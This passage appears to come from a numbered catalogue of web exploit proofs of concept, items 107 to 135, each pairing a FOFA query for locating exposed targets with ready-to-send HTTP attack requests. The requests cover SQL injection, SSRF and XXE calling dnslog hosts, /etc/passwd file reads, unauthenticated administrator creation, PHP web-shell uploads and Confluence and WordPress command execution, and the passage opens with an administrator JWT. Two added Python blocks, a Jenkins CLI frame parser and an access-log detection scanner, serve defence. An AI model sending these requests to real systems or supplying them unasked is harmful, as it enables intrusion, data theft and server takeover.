Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

Body (shown as a Python bytes literal; the raw bytes go on the wire):
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

The download side of the same session (same Session id) returns the output:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (lines of /etc/passwd leak back through the argument-parsing error, because "@/etc/passwd" is expanded to the file's contents):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


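The request body above is the Jenkins CLI's framed protocol, and the vulnerable step is the "@/etc/passwd" argument: args4j, which parses the command line on the controller, expands an argument starting with "@" into the contents of that file. The following is an added example, not code from the article or from Jenkins: it decodes a /cli?remoting=false upload body into its frames and lists the arguments that would trigger that expansion, so a proxy or log pipeline in front of Jenkins can alert on them. The frame layout and the opcode numbering (ARG=0, LOCALE=1, ENCODING=2, START=3) are read off the bytes in the POC, which is the byte string used below; build_cli_body is a helper written for this example to produce a clean request for comparison.

```python
import struct

# Opcode numbering as it appears in the POC body (Jenkins PlainCLIProtocol.Op order).
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}
STRING_OPS = {"ARG", "LOCALE", "ENCODING"}

# Request body from the POC above: args "help" and "@/etc/passwd", encoding GBK, locale en_US, start.
POC_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)

def parse_cli_frames(body: bytes) -> list:
    """Split an upload-side CLI body into (opcode name, value) frames.

    Each frame is: 4-byte big-endian payload length, 1-byte opcode, payload.
    String-carrying ops use Java's writeUTF layout: 2-byte length + UTF-8 bytes.
    """
    frames, pos = [], 0
    while pos + 5 <= len(body):
        (payload_len,) = struct.unpack_from(">I", body, pos)
        opcode = body[pos + 4]
        payload = body[pos + 5:pos + 5 + payload_len]
        if len(payload) != payload_len:
            raise ValueError(f"truncated frame at offset {pos}")
        op = OPS.get(opcode, f"OP{opcode}")
        value = None
        if op in STRING_OPS:
            (n,) = struct.unpack_from(">H", payload)
            value = payload[2:2 + n].decode("utf-8")
        frames.append((op, value))
        pos += 5 + payload_len
    return frames

def build_cli_body(args: list, encoding: str = "UTF-8", locale: str = "en_US") -> bytes:
    """Encode a legitimate argument list in the same framing (helper for this example)."""
    def frame(opcode: int, text: str = None) -> bytes:
        payload = b""
        if text is not None:
            # Plain UTF-8; Java's modified UTF-8 differs only for NUL and non-BMP characters.
            data = text.encode("utf-8")
            payload = struct.pack(">H", len(data)) + data
        return struct.pack(">I", len(payload)) + bytes([opcode]) + payload
    body = b"".join(frame(0, a) for a in args)
    return body + frame(2, encoding) + frame(1, locale) + frame(3)

def file_expansion_args(frames: list) -> list:
    """Arguments args4j would replace with the contents of a file on the controller."""
    return [v for op, v in frames if op == "ARG" and v and v.startswith("@")]

if __name__ == "__main__":
    frames = parse_cli_frames(POC_BODY)
    for op, value in frames:
        print(f"{op:<9}{value if value is not None else ''}")
    print("file-expansion arguments:", file_expansion_args(frames))
```

An alert on any "@"-prefixed ARG frame catches this class of request regardless of which command (help, connect-node, who-am-i and so on) is used to smuggle the file name; it also covers the partial-read variants of the same bug that only echo the first line of the file.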
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the front page to obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


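Most of the POCs from item 95 to item 117 leave their signature in the request line alone, so a defender can go through existing web access logs before touching any system. The following is an added example, not part of the original article: it parses combined-format access log lines, URL-decodes the request target and matches a handful of the indicators seen above (updatexml/extractvalue and sleep() in query strings, requirePasswordChange=Y under /webtools/control/, the "..;/" traversal from item 110, the ";curl" injection from item 101, and a file:// or http:// scheme inside a parameter as in items 108 and 113). The log lines are constructed for the example and patterned on the POCs; the rule set is a starting point, not a complete signature list.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# (rule id, pattern applied to the URL-decoded request target)
RULES = [
    ("sqli-error", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("sqli-time", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("ofbiz-auth-bypass", re.compile(r"/webtools/control/\S*?requirePasswordChange=Y", re.I)),
    ("tomcat-traversal", re.compile(r"\.\.;/")),
    ("cmd-injection", re.compile(r";\s*(?:curl|wget|ping|nc|bash|sh|id|whoami)\b", re.I)),
    ("url-scheme-in-param", re.compile(r"=(?:file|https?|gopher|dict)://", re.I)),
]

def scan_access_log(text: str) -> list:
    """Return one record per log line that matches at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip
        decoded = unquote_plus(m["target"])
        rules = [rule_id for rule_id, rx in RULES if rx.search(decoded)]
        if rules:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": int(m["status"]),
                "rules": rules,
            })
    return hits

# Constructed sample lines, patterned on the POCs above (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2024:10:00:01 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 412 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Jan/2024:10:00:02 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.6 - - [31/Jan/2024:10:00:03 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1503 "-" "Mozilla/5.0"
10.0.0.6 - - [31/Jan/2024:10:00:04 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 7210 "-" "Mozilla/5.0"
10.0.0.7 - - [31/Jan/2024:10:00:05 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0 "-" "Mozilla/5.0"
10.0.0.7 - - [31/Jan/2024:10:00:06 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 2903 "-" "Mozilla/5.0"
10.0.0.8 - - [31/Jan/2024:10:00:07 +0000] "GET /wp-content/themes/bricks/style.css HTTP/1.1" 200 15320 "-" "Mozilla/5.0"
10.0.0.8 - - [31/Jan/2024:10:00:08 +0000] "GET /search?q=sleep+tips HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["rules"], hit["target"])
```

The decode step matters: the Ivanti injection arrives as %3bcurl and the WordPress payloads as %28SELECT%28SLEEP..., so rules written against the raw request line miss them. The last two sample lines are benign on purpose (a theme asset and a search for "sleep tips") and produce no hit, which is the false-positive check to keep when adding rules.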
118. Byzoro (北京百卓) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field decides where the upload is written; then access /home/src.php.

119. Byzoro (北京百卓) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

The id parameter is time-based: a 5 second delay when the database name is 3 characters long confirms the injection.

120. Byzoro (北京百卓) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php

121. Beijing Byzoro (北京百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro (北京百绰智能) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; plaintext: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
